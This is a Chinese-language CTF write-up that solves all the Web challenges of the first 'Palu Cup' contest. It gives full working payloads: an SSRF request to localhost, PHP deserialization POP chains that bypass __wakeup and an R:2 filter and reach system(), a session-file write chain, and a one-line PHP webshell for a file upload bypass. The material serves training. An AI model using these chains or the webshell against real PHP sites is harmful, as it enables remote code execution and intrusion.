【WP】第一届 “帕鲁杯“ - CTF挑战赛 Web 全解

avatar
作者
猴君
阅读量:0

Web

Web-签到

考点:审计py代码

from flask import Flask, request, jsonify import requests from flag import flag  # 假设从 flag.py 文件中导入了 flag 函数 app = Flask(__name__)  @app.route('/', methods=['GET', 'POST']) def getinfo():     url = request.args.get('url')     if url:         # 请求url         response = requests.get(url)         content = response.text         print(content)         if "paluctf" in content:             return flag         else:             return content     else:         response = {             'message': 200,  # 这里是数值,不是字符串             'data': "Come sign in and get the flag!"         }         return jsonify(response) @app.route('/flag', methods=['GET', 'POST']) def flag1():     return "paluctf"  if __name__ == '__main__':     app.run(debug=True, host="0.0.0.0", port=80)
http://127.0.0.1:50258/?url=http://localhost/flag

R23 

考点:

1.采用&引用绕过_wakeup()魔术方法

2.PHP序列化中的R与r (frankli.site)

参考:PHP序列化中的R与r (frankli.site)

3.无用数据再引用绕过R:2

源代码:

<?php show_source(__FILE__); class a{     public function __get($a){         $this->b->love();     } }  class b{     public function __destruct(){         $tmp = $this->c->name;     }     public function __wakeup(){         $this->c = "no!";         $this->b = $this->a;     } }  class xk{     public function love(){        system($_GET['a']);     } }  if(preg_match('/R:2|R:3/',$_GET['pop'])){     die("no"); } unserialize($_GET['pop']);

出口函数:  xy类里面的system($_GET['a']);入口一看就是b类,__wakeup->__destruct->__get->love,越过wakeup魔术方法可采用数组模式 但没有 还可以采用&引用绕过

$s=new b(); $s->c=&$s->b; $s->a=new a(); $s->a->b=new xk(); echo serialize($s);

得到O:1:"b":3:{s:1:"b";N;s:1:"c";R:2;s:1:"a";O:1:"a":1:{s:1:"b";O:2:"xk":0:{}}} 

if(preg_match('/R:2|R:3/',$_GET['pop'])){     die("no"); }

但是题目不能出现R:2,加个无用数据再引用会变成R:4

$s=new b(); $s->c=&$s->b; $s->a=new a(); $s->a->b=new xk(); $m=array(); $m[0]='1'; $m[1]=$s; echo serialize($m);

POC:

?pop=a:2:{i:0;s:1:"1";i:1;O:1:"b":3:{s:1:"b";N;s:1:"c";R:4;s:1:"a";O:1:"a":1:{s:1:"b";O:2:"xk":0:{}}}}&a=cat /f*

宇宙召唤 

考点:

1.不超过1KB的小马 <?=`$_GET[1]`;

2.*可以截断文件名 比如1php*.png=1.php

3.添加文件头绕过

CTFhub 文件上传漏洞 靶场实战通关攻略 - FreeBuf网络安全行业门户

按照考点做就行了 

php不行 一步一步修改 

my love

考点:

1.反序列化中session利用

2. 采用&引用绕过_wakeup()魔术方法

PHP session反序列化总结 - FreeBuf网络安全行业门户

CTFweb篇-反序列化和SESSION(一)_ctf session-CSDN博客

源码 :

<?php  class a{     public function __get($a){         $this->b->love();     } }  class b{     public function __destruct(){         $tmp = $this->c->name;     }     public function __wakeup(){         $this->c = "no!";         $this->b = $this->a;     } }  class xk{     public function love(){         $a = $this->mylove;     }     public function __get($a){         if(preg_match("/\.|\.php/",$this->man)){             die("文件名不能有.");         }         file_put_contents($this->man,base64_decode($this->woman));     } } class end{     public function love(){         ($this->func)();     } }  if(isset($_GET['pop'])) {     unserialize($_GET['pop']);     if(preg_match("/N$/",$_GET['test'])){         $tmp = $_GET['test'];     }  } else{     show_source(__FILE__);     phpinfo(); } if($$tmp['name']=='your are good!'){     echo 'ok!';     system($_GET['shell']);

根据代码发现 有两个函数出口 

file_put_contents($this->man,base64_decode($this->woman));  ($this->func)();

那我们就可以先利用第一个写入 session文件,然后利用第二个读取,从而RCE

 1.file_put_contents($this->man,base64_decode($this->woman));
<?php  class a{     public $a; }  class b{     public $a;     public $b;     public $c; }  class xk{      public $man='/var/lib/php/session/sess_1';//phpinfo获取     public $woman='bmFtZXxzOjE0OiJ5b3VyIGFyZSBnb29kISI7';//  name|s:14:"your are good!"; } class end{ }  $m=new b(); $m->b = &$m->c; $m->a = new a(); $m->a->b = new xk(); echo serialize($m);

得到如下  然后上传

O:1:"b":3:{s:1:"a";O:1:"a":2:{s:1:"a";N;s:1:"b";O:2:"xk":2:{s:3:"man";s:27:"/var/lib/php/session/sess_1";s:5:"woman";s:36:"bmFtZXxzOjE0OiJ5b3VyIGFyZSBnb29kISI7";}}s:1:"b";N;s:1:"c";R:7;} 

2.下面读取session文件 
<?php  class a{     public $a; }  class b{     public $a;     public $b;     public $c; }  class xk{      public $man='/var/lib/php/session/sess_1';//phpinfo获取 且定义文件名为1     public $woman='bmFtZXxzOjE0OiJ5b3VyIGFyZSBnb29kISI7';//  name|s:14:"your are good!"; } class end{     public $func='session_start';  }   $m=new b(); $m->b = &$m->c; $m->a = new a(); $m->a->b = new end(); echo serialize($m);
O:1:"b":3:{s:1:"a";O:1:"a":2:{s:1:"a";N;s:1:"b";O:3:"end":1:{s:4:"func";s:13:"session_start";}}s:1:"b";N;s:1:"c";R:6;}

然后一起传参

?pop=O:1:"b":3:{s:1:"a";O:1:"a":1:{s:1:"b";O:3:"end":1:{s:4:"func";s:13:"session_start";}}s:1:"b";N;s:1:"c";R:5;}&test=_SESSION&shell=cat+f*

test=_SESSION读取序列化文件数据这里要加个Cookie: PHPSESSID = 1 上面定义了文件名为1

小知识点:session的存放位置 - 三哥~! - 博客园 (cnblogs.com)

广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!